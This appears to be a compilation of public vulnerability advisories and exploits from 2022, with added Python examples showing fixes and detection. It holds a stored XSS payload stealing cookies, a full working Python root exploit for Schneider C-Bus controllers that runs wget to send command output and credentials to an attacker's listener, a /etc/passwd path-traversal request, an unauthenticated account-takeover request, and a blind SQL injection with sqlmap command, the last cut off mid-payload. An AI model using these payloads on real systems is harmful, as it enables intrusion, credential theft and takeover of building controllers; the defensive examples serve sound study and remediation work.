<pre><code>## Title: Fast Food Ordering System 1.0 Stored Cross-Site Scripting<br />## Author: Ashish Kumar<br />## Date: 05.31.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software:<br />https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html<br />## Reference:<br />https://medium.com/@cyberthoth/fast-food-ordering-system-1-0-cross-site-scripting-7927f4b1edd6<br /><br />#Description:<br />#The Line 255 of Master.php sends unvalidated data to a web browser, which<br />can result in the browser executing malicious code.<br /><br />#echo $Master->save_category();<br /><br />#PoC:<br />POST /ffos/classes/Master.php?f=save_category HTTP/1.1<br />Host: localhost<br />Content-Length: 480<br />sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: multipart/form-data;<br />boundary=----WebKitFormBoundarySmYVeqOBMhcSziZM<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/ffos/admin/?page=categories<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: PHPSESSID=junl7tbvb7hvrdeq776aislbcj<br />Connection: close<br /><br />------WebKitFormBoundarySmYVeqOBMhcSziZM<br />Content-Disposition: form-data; name="id"<br /><br />10<br />------WebKitFormBoundarySmYVeqOBMhcSziZM<br />Content-Disposition: form-data; name="name"<br /><br />XSS<br />------WebKitFormBoundarySmYVeqOBMhcSziZM<br />Content-Disposition: form-data; name="description"<br /><br />Testing XSS "><img src="" onerror="alert(document.cookie)"><br />------WebKitFormBoundarySmYVeqOBMhcSziZM<br 
/>Content-Disposition: form-data; name="status"<br /><br />1<br />------WebKitFormBoundarySmYVeqOBMhcSziZM--<br /></code></pre>
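The advisory names the defect (an unvalidated value echoed into the page) but not the fix. As an added example that is not part of the advisory and not the application's PHP, the following Python parses a constructed copy of the PoC's multipart body with the standard library and then renders the stored "description" both the vulnerable way and with HTML encoding applied at output time. The field names and payload are the advisory's; the two row-rendering functions are assumptions about how a category list would be displayed.

```python
"""Added example, not the advisory's or the application's code: parse a
constructed copy of the PoC's multipart body, then render the stored
'description' both the vulnerable way and with output encoding."""
import html
from email.parser import BytesParser
from email.policy import default

BOUNDARY = "----WebKitFormBoundarySmYVeqOBMhcSziZM"   # boundary string from the PoC

# Constructed request body mirroring the PoC's four fields.
BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="id"\r\n\r\n10\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="name"\r\n\r\nXSS\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="description"\r\n\r\n'
    'Testing XSS "><img src="" onerror="alert(document.cookie)">\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="status"\r\n\r\n1\r\n'
    f"--{BOUNDARY}--\r\n"
).encode()


def parse_form_data(body: bytes, boundary: str) -> dict:
    """Return {field name: value} for a multipart/form-data body, using the
    email package's MIME parser (form-data parts are ordinary MIME parts)."""
    raw = (f'Content-Type: multipart/form-data; boundary="{boundary}"\r\n'
           "MIME-Version: 1.0\r\n\r\n").encode() + body
    msg = BytesParser(policy=default).parsebytes(raw)
    fields = {}
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        fields[name] = part.get_content().rstrip("\r\n")
    return fields


def render_category_row_unsafe(fields: dict) -> str:
    """The vulnerable pattern: a stored value is echoed into HTML unchanged,
    so the '">' in the description ends the surrounding markup and the
    <img onerror=...> that follows is live."""
    return f'<tr><td>{fields["name"]}</td><td>{fields["description"]}</td></tr>'


def render_category_row(fields: dict) -> str:
    """Same row with every untrusted value HTML-encoded at output time.
    Store raw, encode on output: the data is unchanged, only its rendering."""
    esc = lambda value: html.escape(value, quote=True)
    return f'<tr><td>{esc(fields["name"])}</td><td>{esc(fields["description"])}</td></tr>'


if __name__ == "__main__":
    parsed = parse_form_data(BODY, BOUNDARY)
    print("unsafe:", render_category_row_unsafe(parsed))
    print("encoded:", render_category_row(parsed))
```

Encoding belongs at the point of output, in the context the value lands in (here HTML body/attribute text); the same stored string rendered into a JavaScript string or a URL needs that context's encoder instead.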
<pre><code>#!/usr/bin/env python3<br /># -*- coding: utf-8 -*-<br />#<br />#<br /># Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 Remote Root Exploit<br />#<br />#<br /># Vendor: Schneider Electric SE<br /># Product web page: https://www.se.com | https://www.clipsal.com<br /># Product details:<br /># - https://www.clipsal.com/Trade/Products/ProductDetail?catno=5500SHAC<br /># - https://www.se.com/ww/en/product/5500AC2/application-controller-spacelogic-cbus-rs232-485-ethernet-din-mount-24v-dc/<br /># Affected version: CLIPSAL 5500SHAC (i.MX28)<br /># CLIPSAL 5500NAC (i.MX28)<br /># SW: 1.10.0, 1.6.0<br /># HW: 1.0<br /># Potentially vulnerable (alternative products/same codebase?): 5500NAC2 and 5500AC2<br /># SpaceLogic C-Bus<br />#<br /># Summary: The C-Bus Network Automation Controller (5500NAC) and the Wiser<br /># for C-Bus Automation Controller (5500SHAC) are advanced controllers from<br /># Schneider Electric. They are specifically designed to unite the C-Bus home<br /># automation solution with common household communication protocols, from<br /># lighting and climate control, to security, entertainment and energy metering.<br /># The Wiser for C-Bus Automation Controller manages and controls C-Bus systems<br /># for residential homes or zones within a building and integrates functions<br /># such as heating/cooling, energy/load monitoring and remote control for C-Bus<br /># and Modbus.<br />#<br /># Desc: The automation controller suffers from an authenticated arbitrary<br /># command execution vulnerability. 
An attacker can abuse the Start-up (init)<br /># script editor and exploit the 'script' POST parameter to insert malicious<br /># Lua script code and execute commands with root privileges that will grant<br /># full control of the device.<br />#<br /># ------------------------------------------------------------------------------<br /># $ ./c-bus.py http://192.168.0.10 "cat /etc/config/httpd;id" 192.168.0.37 8888<br /># ----------------------------------------------------------------------<br /># Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at 15.03.2022 11:26:38<br /># [*] Starting exfiltration handler on port 8888<br /># [*] Writing Lua initscript... done.<br /># [*] Running os.execute()... done.<br /># [*] Got request from 192.168.0.10:33522<br /># [*] Printing target's request:<br />#<br /># b"GET / HTTP/1.1\r\nHost: 192.168.0.37:8888\r\nUser-Agent: \nconfig user<br /># 'admin'\n\toption password 'admin123'\n\nconfig user 'remote'\n\toption<br /># password 'remote'\n\nuid=0(root) gid=0(root) groups=0(root)\r\nConnection:<br /># close\r\n\r\n"<br />#<br /># [*] Cleaning up... 
done.<br />#<br /># $ <br /># ------------------------------------------------------------------------------<br />#<br /># Tested on: CPU model: ARM926EJ-S rev 5 (v5l)<br /># GNU/Linux 4.4.115 (armv5tejl)<br /># LuaJIT 2.0.5<br /># FlashSYS v2<br /># nginx<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># Macedonian Information Security Research and Development Laboratory<br /># Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2022-5707<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5707.php<br />#<br />#<br /># 12.03.2022<br />#<br /><br />import threading#!<br />import datetime##!<br />import requests##!<br />import socket####!<br />import time######!<br />import sys#######!<br />import re########!<br /><br />from requests.auth import HTTPBasicAuth<br />from time import sleep as spikaj<br /><br />class Wiser:<br /><br /> def __init__(self):<br /> self.headers = None<br /> self.uri = '/scada-main/scripting/'<br /> self.savs = self.uri + 'save'<br /> self.runs = self.uri + 'run'<br /> self.start = datetime.datetime.now()<br /> self.start = self.start.strftime('%d.%m.%Y %H:%M:%S')<br /> self.creds = HTTPBasicAuth('admin', 'admin123')<br /><br /> def memo(self):<br /> if len(sys.argv) != 5:<br /> self.use()<br /> else:<br /> self.target = sys.argv[1]<br /> self.execmd = sys.argv[2]<br /> self.localh = sys.argv[3]<br /> self.localp = int(sys.argv[4])<br /> if not 'http' in self.target:<br /> self.target = 'http://{}'.format(self.target)<br /><br /> def exfil(self):<br /> print('[*] Starting exfiltration handler on port {}'.format(self.localp))<br /> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> s.bind(('0.0.0.0', self.localp))<br /> while True:<br /> try:<br /> s.settimeout(9)<br /> s.listen(1)<br /> conn, addr = s.accept()<br /> print('[*] Got request from {}:{}'.format(addr[0], addr[1]))<br /> data = conn.recv(2003)<br /> print('[*] Printing 
target\'s request:')<br /> print('\n%s' %data)<br /> except socket.timeout as p:<br /> print('[!] Something\'s not right. Check your port mappings!')<br /> break<br /> s.close()<br /> self.clean()<br /><br /> def mtask(self):<br /> konac = threading.Thread(name='thricer.exe', target=self.exfil)<br /> konac.start()<br /> self.byts()<br /><br /> def byts(self):<br /> self.headers = {<br /> 'Referer':self.target+'/scada-main/main/editor?id=initscript',<br /> 'Sec-Ch-Ua':'"(Not(A:Brand";v="8", "Chromium";v="98"',<br /> 'Cookie':'x-logout=0; x-auth=; x-login=1; pin=',<br /> 'Content-Type':'text/plain;charset=UTF-8',<br /> 'User-Agent':'SweetHomeAlabama/2003.59',<br /> 'X-Requested-With':'XMLHttpRequest',<br /> 'Accept-Language':'en-US,en;q=0.9',<br /> 'Accept-Encoding':'gzip, deflate',<br /> 'Sec-Ch-Ua-Platform':'"Windows"',<br /> 'Sec-Fetch-Site':'same-origin',<br /> 'Connection':'keep-alive',<br /> 'Sec-Fetch-Dest':'empty',<br /> 'Sec-Ch-Ua-Mobile':'?0',<br /> 'Sec-Fetch-Mode':'cors',<br /> 'Origin':self.target,<br /> 'Accept':'*/*',<br /> 'sec-gpc':'1'<br /> }<br /> <br /> self.loada = '\x64\x61\x74\x61\x3D\x7B' # data={<br /> self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x34\x22\x3A\x22\x22\x2C' # "ext-comp-1004":"",<br /> self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35\x22\x3A\x22\x22\x2C' # "ext-comp-1005":"",<br /> self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x22\x3A\x22\x22\x2C' # "ext-comp-1006":"",<br /> self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x37\x22\x3A\x22\x22\x2C' # "ext-comp-1007":"",<br /> self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x38\x22\x3A\x22\x22\x2C' # "ext-comp-1008":"",<br /> self.loada += '\x22\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70\x2D\x73\x65\x61\x72\x63\x68\x22\x3A\x22\x22\x2C' # "scada-help-search":"",<br /> self.loada += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x2C' # 
"id":"initscript",<br /> self.loada += '\x22\x73\x63\x72\x69\x70\x74\x22\x3A\x6E\x75\x6C\x6C\x2C' # "script":null,<br /> self.loada += '\x22\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C\x79\x22\x3A\x22\x74\x72\x75\x65\x22\x7D' # "scriptonly":"true"}<br /> self.loada += '\x26\x73\x63\x72\x69\x70\x74\x3D\x6F\x73\x2E\x65\x78\x65\x63\x75\x74\x65' # &script=os.execute<br /> self.loada += '\x28\x27\x77\x67\x65\x74\x20\x2D\x55\x20\x22\x60' # ('wget -U "`<br /> self.loada += self.execmd # [command input]<br /> self.loada += '\x60\x22\x20' # `".<br /> self.loada += self.localh+':'+str(self.localp) # [listener input]<br /> self.loada += '\x27\x29' # ')<br /> self.loadb = '\x64\x61\x74\x61\x3D\x7B' # data={<br /> self.loadb += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x7D' # "id":"initscript"}<br /> <br /> print('[*] Writing Lua initscript... ', end='')<br /> sys.stdout.flush()<br /> spikaj(0.7)<br /><br /> htreq = requests.post(self.target+self.savs, data=self.loada, headers=self.headers, auth=self.creds)<br /> if not 'success' in htreq.text:<br /> print('didn\'t work!')<br /> exit(17)<br /> else:<br /> print('done.')<br /> <br /> print('[*] Running os.execute()... 
', end='')<br /> sys.stdout.flush()<br /> spikaj(0.7)<br /><br /> htreq = requests.post(self.target+self.runs, data=self.loadb, headers=self.headers, auth=self.creds)<br /> if not 'success' in htreq.text:<br /> print('didn\'t work!')<br /> exit(19)<br /> else:<br /> print('done.')<br /><br /> def splash(self):<br /> Baah_loon = '''<br /> ######<br /> ##########<br /> ###### _\_<br /> ##===----[.].]<br /> #( , _\\<br /> # )\__|<br /> \ /<br /> `-._``-'<br /> >@<br /> |<br /> |<br /> |<br /> |<br /> | Schneider Electric C-Bus SmartHome Automation Controller<br /> | Root Remote Code Execution Proof of Concept<br /> | ZSL-2022-5707<br /> |<br /> |<br /> |<br /> '''<br /> print(Baah_loon)<br /><br /> def use(self):<br /> self.splash()<br /> print('Usage: ./c-bus.py [target] [cmd] [lhost] [lport]')<br /> exit(0)<br /><br /> def clean(self):<br /> print('\n[*] Cleaning up... ', end='')<br /> sys.stdout.flush()<br /> spikaj(0.7)<br /><br /> self.headers = {'X-Requested-With':'XMLHttpRequest'}<br /><br /> self.blank = '\x64\x61\x74\x61\x3D\x25\x37\x42\x25\x32\x32'<br /> self.blank += '\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30'<br /> self.blank += '\x30\x34\x25\x32\x32\x25\x33\x41\x25\x32\x32'<br /> self.blank += '\x25\x32\x32\x25\x32\x43\x25\x32\x32\x65\x78'<br /><br /> self.dlank = '\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35'<br /> self.dlank += '\x25\x32\x32\x25\x33\x41\x25\x32\x32\x25\x32'<br /> self.dlank += '\x32\x25\x32\x43\x25\x32\x32\x65\x78\x74\x2D'<br /> self.dlank += '\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x25\x32'<br /><br /> self.clank = '\x32\x25\x33\x41\x25\x32\x32\x25\x32\x32\x25'<br /> self.clank += '\x32\x43\x25\x32\x32\x65\x78\x74\x2D\x63\x6F'<br /> self.clank += '\x6D\x70\x2D\x31\x30\x30\x37\x25\x32\x32\x25'<br /> self.clank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43'<br /><br /> self.slank = '\x25\x32\x32\x65\x78\x74\x2D\x63\x6F\x6D\x70'<br /> self.slank += '\x2D\x31\x30\x30\x38\x25\x32\x32\x25\x33\x41'<br /> self.slank += 
'\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25\x32'<br /> self.slank += '\x32\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70'<br /><br /> self.glank = '\x2D\x73\x65\x61\x72\x63\x68\x25\x32\x32\x25'<br /> self.glank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43'<br /> self.glank += '\x25\x32\x32\x69\x64\x25\x32\x32\x25\x33\x41'<br /> self.glank += '\x25\x32\x32\x69\x6E\x69\x74\x73\x63\x72\x69'<br /><br /> self.hlank = '\x70\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32'<br /> self.hlank += '\x73\x63\x72\x69\x70\x74\x25\x32\x32\x25\x33'<br /> self.hlank += '\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25'<br /> self.hlank += '\x32\x32\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C'<br /><br /> self.flank = '\x79\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74'<br /> self.flank += '\x72\x75\x65\x25\x32\x32\x25\x37\x44'#######'<br /><br /> self.clear = f'{self.blank}{self.dlank}{self.clank}{self.slank}{self.glank}{self.hlank}{self.flank}'<br /> htreq = requests.post(self.target+self.savs, data=self.clear, headers=self.headers, auth=self.creds)<br /> if not 'success' in htreq.text:<br /> print('didn\'t work!')<br /> exit(18)<br /> else:<br /> print('done.')<br /> exit(-1)<br /><br /> def main(self):<br /> print('-'*70)<br /> print('Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at', self.start)<br /> self.memo(), self.mtask()<br /><br />if __name__ == '__main__':<br /> Wiser().main()<br /></code></pre>
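The exploit above writes a Lua start-up script through the controller's scripting endpoint and runs it; for a defender, the observable is an authenticated save to that endpoint whose script calls OS primitives. The following Python is an added example, not the exploit's and not the vendor's code: it audits a constructed request log for saves on `/scada-main/scripting/save` (the endpoint path and the `data=...&script=...` body shape come from the exploit) whose Lua source calls `os.execute` or similar. The tab-separated log format and the sample lines are assumptions made for the example.

```python
"""Added example, not the exploit's or the vendor's code: offline audit of a
constructed request log for start-up script saves that call dangerous Lua
primitives on the controller's scripting endpoint."""
import json
import re
from urllib.parse import unquote_plus

SAVE_PATH = "/scada-main/scripting/save"   # endpoint used by the exploit

# Lua primitives that reach the OS or the filesystem; os.execute is the one
# the PoC uses.  Any of these in a script saved through the web UI of a
# building controller deserves review even when the user is 'admin'.
DANGEROUS_LUA = re.compile(
    r"\b(os\.execute|io\.popen|os\.remove|os\.rename|io\.open|dofile|loadfile|loadstring)\b"
)

# Constructed log lines: timestamp, client, user, method, path, body (tab-separated).
SAMPLE_LOG = [
    "2022-03-15T11:20:01Z\t192.168.0.37\tadmin\tGET\t/scada-main/main/editor?id=initscript\t",
    "2022-03-15T11:22:10Z\t192.168.0.37\tadmin\tPOST\t/scada-main/scripting/save\t"
    'data={"id":"initscript","script":null,"scriptonly":"true"}'
    "&script=print('startup complete')",
    "2022-03-15T11:26:38Z\t192.168.0.37\tadmin\tPOST\t/scada-main/scripting/save\t"
    'data={"id":"initscript","script":null,"scriptonly":"true"}'
    "&script=os.execute('wget -U \"`cat /etc/config/httpd;id`\" 192.168.0.37:8888')",
]


def parse_form_body(body: str) -> dict:
    """Split a form body on '&' only (';' inside a command is not a
    separator) and percent-decode both halves of each pair."""
    fields = {}
    for pair in body.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def audit_script_saves(lines):
    """Return one finding per script save whose Lua source calls a
    dangerous primitive; each finding names who saved which script."""
    findings = []
    for line in lines:
        ts, client, user, method, path, body = line.split("\t", 5)
        if method != "POST" or path.split("?", 1)[0] != SAVE_PATH:
            continue
        fields = parse_form_body(body)
        try:
            script_id = json.loads(fields.get("data") or "{}").get("id")
        except ValueError:
            script_id = None
        calls = sorted(set(DANGEROUS_LUA.findall(fields.get("script", ""))))
        if calls:
            findings.append({"ts": ts, "client": client, "user": user,
                             "script_id": script_id, "calls": calls})
    return findings


if __name__ == "__main__":
    for f in audit_script_saves(SAMPLE_LOG):
        print(f"{f['ts']} {f['user']}@{f['client']} saved '{f['script_id']}' "
              f"calling {', '.join(f['calls'])}")
```

The benign save of a `print(...)` script produces no finding; the one matching the PoC does, and because the exploit cleans up by overwriting the script afterwards, the request log is the durable record, not the script stored on the device.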
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: User Meta<br />Vendor URL: https://wordpress.org/plugins/user-meta<br />Type: Relative Path Traversal [CWE-23]<br />Date found: 2022-02-28<br />Date published: 2022-05-24<br />CVSSv3 Score: 4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)<br />CVE: CVE-2022-0779<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />User Meta Lite 2.4.3 and below<br />User Meta Pro 2.4.3 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />An easy-to-use user profile and management plugin for WordPress that allows<br />user login, reset-password, profile update and user registration with extra<br />fields, all on front-end and many more. User Meta Pro is a versatile user<br />profile builder and user management plugin for WordPress that has the most<br />features on the market. User Meta aims to be your only go to plugin for<br />user management.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The WordPress ajax action "um_show_uploaded_file" is vulnerable to an<br />authenticated path traversal when user-supplied input to the HTTP POST<br />parameter "filepath" is processed by the web application. Since the application<br />does not properly validate and sanitize this parameter, it is possible to<br />enumerate local server files using a blind approach. 
This is because the<br />application doesn't return the contents of the referenced file but instead<br />returns different form elements based on whether a file exists or not.<br /><br />The following Proof-of-Concept triggers this vulnerability:<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: localhost<br />Content-Length: 147<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Cookie: [your-wordpress-auth-cookies]<br />Connection: close<br /><br />field_name=[your-field-name]&filepath=/../../../../../etc/passwd&field_id=[your-field-id]&form_key=[your-form-key]&action=um_show_uploaded_file&pf_nonce=[your-auth-nonce]&is_ajax=true<br /><br /><br />6. RISK<br />=======<br />The vulnerability can be used by an authenticated attacker to enumerate<br />local server files based on a blind approach.<br /><br /><br />7. SOLUTION<br />===========<br />Update to User Meta/User Meta Pro 2.4.4<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-02-28: Discovery of the vulnerability<br />2022-02-28: WPScan (CNA) assigns CVE-2022-0779<br />2022-03-03: Contacted the vendor via their contact form<br />2022-03-06: Vendor response, acknowledgement of the issue<br />2022-03-18: Version 2.4.2 is released<br />2022-03-22: Vulnerability is still exploitable since fix was applied only client-side. Contacted vendor again.<br />2022-04-13: No response, contacted vendor again<br />2022-04-18: Vendor added a new fix to version 2.4.3. Asked to retest.<br />2022-04-19: Vulnerability is still exploitable due to a logic bug in the fix. Contacted vendor again.<br />2022-04-29: Vendor asks whether another fix in version 2.4.4 is fine<br />2022-05-16: Fix seems to work<br />2022-05-24: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /><br /></code></pre>
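The advisory's timeline shows two fixes that did not hold (one client-side only, one with a logic bug) before a server-side one did. The following Python is an added example, not the plugin's code: it contrasts a naive server-side fix that only strips `../` with canonical-path containment, and answers "does this uploaded file exist" identically for a rejected path and for a missing file, which removes the blind existence oracle the advisory describes. The directory layout is constructed; the function names are assumptions.

```python
"""Added example, not the plugin's code: containment check for a
user-supplied 'filepath' and an existence answer that does not leak
whether a path outside the upload directory exists."""
import os
import tempfile
from pathlib import Path


def naive_join(base_dir: str, filepath: str) -> str:
    """A fix that only strips '../' (a common first attempt).  For the
    advisory's payload the remainder is an absolute path, and os.path.join
    discards base_dir when its second argument is absolute."""
    return os.path.join(base_dir, filepath.replace("../", ""))


def resolve_inside(base_dir: str, filepath: str):
    """Canonicalize and require the result to stay under base_dir.
    Returns the resolved Path, or None when the path escapes."""
    base = Path(base_dir).resolve()
    candidate = (base / filepath.lstrip("/")).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        return None
    return candidate


def uploaded_file_status(base_dir: str, filepath: str) -> str:
    """What an 'is this file present' endpoint should answer: the same
    value for a rejected path and for a missing file, so the existence of
    files outside base_dir is not observable through the response."""
    path = resolve_inside(base_dir, filepath)
    return "present" if path is not None and path.is_file() else "absent"


def demo() -> dict:
    """Constructed upload directory with one file, probed three ways."""
    with tempfile.TemporaryDirectory() as d:
        (Path(d) / "avatars").mkdir()
        (Path(d) / "avatars" / "u1.png").write_bytes(b"\x89PNG")
        return {
            "inside": uploaded_file_status(d, "avatars/u1.png"),
            "missing": uploaded_file_status(d, "avatars/nope.png"),
            "traversal": uploaded_file_status(d, "/../../../../../etc/passwd"),
            "naive": naive_join(d, "/../../../../../etc/passwd"),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The containment check is done on the resolved path, after symlinks and `..` components are collapsed, so it does not depend on which textual tricks the input uses.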
<pre><code># Exploit Title: Ingredient Stock Management System v1.0 - Account Takeover (Unauthenticated)<br /># Date: 28/05/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /><br /><br /><br />Description :<br /><br />----------------------<br /><br />Ingredient Stock Management System v1.0 is vulnerable to unauthenticated account takeover.<br />An attacker can take over any registered 'Staff' user account by sending the POST request below<br />and changing the "id", "firstname", "lastname", "username", "password" and "type" parameters.<br /><br /><br /># HTTP Request :<br /><br />POST /isms/classes/Users.php?f=save HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------89160456138077069512415726555<br />Content-Length: 1023<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/isms/admin/?page=user/manage_user<br />Cookie: PHPSESSID=mia3uiom2s9bdtif290t6v1el2<br /><br />-----------------------------89160456138077069512415726555<br />Content-Disposition: form-data; name="id"<br /><br />1<br />-----------------------------89160456138077069512415726555<br />Content-Disposition: form-data; name="firstname"<br /><br />test<br />-----------------------------89160456138077069512415726555<br />Content-Disposition: form-data; name="middlename"<br /><br /><br />-----------------------------89160456138077069512415726555<br />Content-Disposition: form-data; name="lastname"<br /><br />hi<br />-----------------------------89160456138077069512415726555<br />Content-Disposition: form-data; name="username"<br /><br />test<br />-----------------------------89160456138077069512415726555<br />Content-Disposition: form-data; name="password"<br /><br />test<br />-----------------------------89160456138077069512415726555<br />Content-Disposition: form-data; name="type"<br /><br />1<br />-----------------------------89160456138077069512415726555<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------89160456138077069512415726555--<br /><br /><br />====<br />URL Login : http://localhost/isms/admin/login.php <br /></code></pre>
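The request above succeeds because the save handler enforces neither authentication nor ownership. As an added example that is not the application's code, the following Python shows the server-side checks such a handler needs: a logged-in session, a staff user limited to their own record, role changes reserved for administrators, and the password stored as a salted hash rather than as submitted. The user table is constructed, and the meaning of the `type` field (1 = admin, 2 = staff) is an assumption made for the example.

```python
"""Added example, not the application's code: the authorization checks a
'save user' handler needs so that a POST with someone else's id cannot take
over their account."""
import copy
import hashlib
import os

ADMIN, STAFF = 1, 2   # assumed meaning of the 'type' field

# Constructed user table keyed by user id.
USERS = {
    1: {"username": "admin", "type": ADMIN, "pw": None},
    7: {"username": "alice", "type": STAFF, "pw": None},
    8: {"username": "bob", "type": STAFF, "pw": None},
}


def fresh_users() -> dict:
    """Independent copy of the table, so callers can mutate freely."""
    return copy.deepcopy(USERS)


def hash_password(password: str, salt: bytes = None) -> bytes:
    """Salted PBKDF2; the salt is stored in front of the derived key."""
    salt = salt or os.urandom(16)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


def save_user(session_user_id, form: dict, users: dict):
    """Return (http_status, message) for a save request.

    session_user_id is the id bound to the caller's server-side session
    (None when not logged in); 'form' holds the submitted fields."""
    if session_user_id is None or session_user_id not in users:
        return 401, "login required"                  # the PoC stops here
    actor = users[session_user_id]
    target_id = int(form["id"])
    if actor["type"] != ADMIN and target_id != session_user_id:
        return 403, "may only edit own account"       # ownership check
    if actor["type"] != ADMIN and int(form.get("type", actor["type"])) != actor["type"]:
        return 403, "role changes require an administrator"
    target = users.get(target_id)
    if target is None:
        return 404, "no such user"
    target["username"] = form["username"]
    if form.get("password"):
        target["pw"] = hash_password(form["password"])
    if actor["type"] == ADMIN and "type" in form:
        target["type"] = int(form["type"])
    return 200, "saved"


if __name__ == "__main__":
    users = fresh_users()
    poc = {"id": "1", "username": "test", "password": "test", "type": "1"}
    print("unauthenticated PoC:", save_user(None, poc, users))
    print("alice editing alice:", save_user(7, {"id": "7", "username": "alice2"}, users))
    print("bob editing alice:", save_user(8, {"id": "7", "username": "x"}, users))
```

The session id must come from the server-side session, never from the form; the `id` field in the form is only ever the target of the edit, and the check compares the two.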
<pre><code># Exploit Title: Ingredient Stock Management System v1.0 - 'id' Blind SQL Injection<br /># Date: 28/05/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /><br /><br /><br />Description :<br />----------------------<br /><br />Ingredient Stock Management System 1.0 allows SQL injection via the 'id' parameter of<br />/isms/admin/stocks/view_stock.php. Exploiting this issue could allow an attacker to compromise<br />the application, access or modify data, or exploit latent vulnerabilities<br />in the underlying database.<br /><br /><br /># Vulnerable Code :<br /><br />line 74 in file "/isms/admin/stocks/view_stock.php"<br /><br />$stockins = $conn->query("SELECT * FROM `stockin_list` where item_id = '{$id}' order by date(`date`) asc");<br /><br /># Sqlmap command:<br /><br />sqlmap -u 'http://localhost/isms/admin/?page=stocks/view_stock&id=1' -p id --level=5 --risk=3 --dbs --random-agent --eta<br /><br /># Output:<br /><br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: page=stocks/view_stock&id=1' AND 1902=1902 AND 'yluX'='yluX<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=stocks/view_stock&id=1' AND (SELECT 6709 FROM 